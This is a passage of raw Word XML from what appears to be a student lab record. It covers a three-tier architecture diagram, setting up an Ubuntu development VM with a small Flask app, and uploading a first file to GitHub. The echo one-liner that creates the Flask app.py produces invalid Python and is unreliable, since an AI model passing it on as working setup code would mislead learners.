        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>[ Client Tier (Presentation Layer) ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>↓    HTTP/S Requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>+----------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>|       Web Browser / Mobile App (UI/UX)             |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>+----------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>↕ API Calls / HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>[ Application Tier (Logic Layer) ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>+----------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>|   Web Server / Application Server                  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>|   - Business Logic                                 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>|   - REST APIs / Controllers                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>|   - Authentication / Authorization                 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>+----------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>↕ SQL Queries / ORM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>[ Data Tier (Database Layer) ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>+----------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>|   Database Server                                   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>|   - Relational DB (MySQL, PostgreSQL)              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>|   - NoSQL (MongoDB, Redis)                         |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>+----------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRPr="006836E9" w:rsidRDefault="006836E9" w:rsidP="00E249E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006836E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="006836E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explore different types of software environments (development, testing, production). Set up a basic environment in a virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRPr="006836E9" w:rsidRDefault="006836E9" w:rsidP="00E249E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🔍 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Types of Software Environ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1"/>
        <w:gridCol w:w="7695"/>
      </w:tblGrid>
      <w:tr w:rsidR="006836E9" w:rsidTr="006836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836E9" w:rsidRDefault="00683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0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006836E9" w:rsidRDefault="00683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6836E9" w:rsidTr="0068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6E9" w:rsidRDefault="006836E9">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9">
            <w:r>
              <w:t>Used by developers to write and debug code. Has developer tools, logs, and minimal security.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006836E9" w:rsidTr="0068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6E9" w:rsidRDefault="006836E9">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9">
            <w:r>
              <w:t>Used for QA testing. Mirrors production with controlled test data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006836E9" w:rsidTr="006836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6E9" w:rsidRDefault="006836E9">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9">
            <w:r>
              <w:t>Live environment accessed by real users. High performance and security required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💻 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setting Up a Basic Environment in a Virtual Machine (Ubuntu Example)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Step-by-Step (Using VirtualBox and Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Install VirtualBox &amp; Download Ubuntu ISO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>VirtualBox</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Ubuntu ISO</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Create a New Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OS: Ubuntu (64-bit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RAM: 2 GB+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disk: 20 GB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Install Ubuntu in the VM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Set Up a Development Environment</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Open terminal in Ubuntu and run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9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sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9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sudo apt install git curl build-essential</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9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sudo apt install python3-pip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9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sudo apt install nodejs npm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Set Up a Web App Environment (Optional)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Example: Basic Flask App (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9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pip3 install flask</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9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mkdir myapp &amp;&amp; cd myapp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9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echo 'from flask import Flask; app = Flask(__name__); @app.route("/")\ndef home(): return "Hello from VM!"' &gt; app.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9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flask run --host=0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Access App from Browser (If network configured)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Open browser and go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>http://localhost:5000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the host machine (requires port forwarding or bridged adapter in VM settings).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E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</w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="006836E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Write and upload your first source code file to Github</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sure! Here's a step-by-step guide to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>write and upload your first source code file to GitHub</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>GitHub account</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Sign up here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> installed – run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>git --version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🖊️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Write Your First Code File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Example: A simple Python program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a file called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>hello.py</w:t>
      </w:r>
      <w:r>
        <w:t>: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# hello.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>print("Hello, GitHub!")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🧭 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Steps to Upload It to GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRPr="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006836E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="006836E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Option A: Upload via GitHub Website (Easy Way)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>New repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Give it a name (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>my-first-code</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Keep it Public or Private</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Create repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"Add file" &gt; "Upload files"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Drag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>hello.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the page or click "choose your files"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Add a commit message (e.g., “Initial commit”)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"Commit changes"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>✅ Done! Your file is now on GitHub.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRPr="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006836E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="006836E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Option B: Upload via Git &amp; Terminal (Developer Way)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# 1. Create folder and add file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mkdir my-first-code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cd my-first-code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echo 'print("Hello, GitHub!")' &gt; hello.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pP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# 2. Initialize Git repo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init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add hello.py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commit -m "Initial commit"</w:t>
      </w:r>
    </w:p>
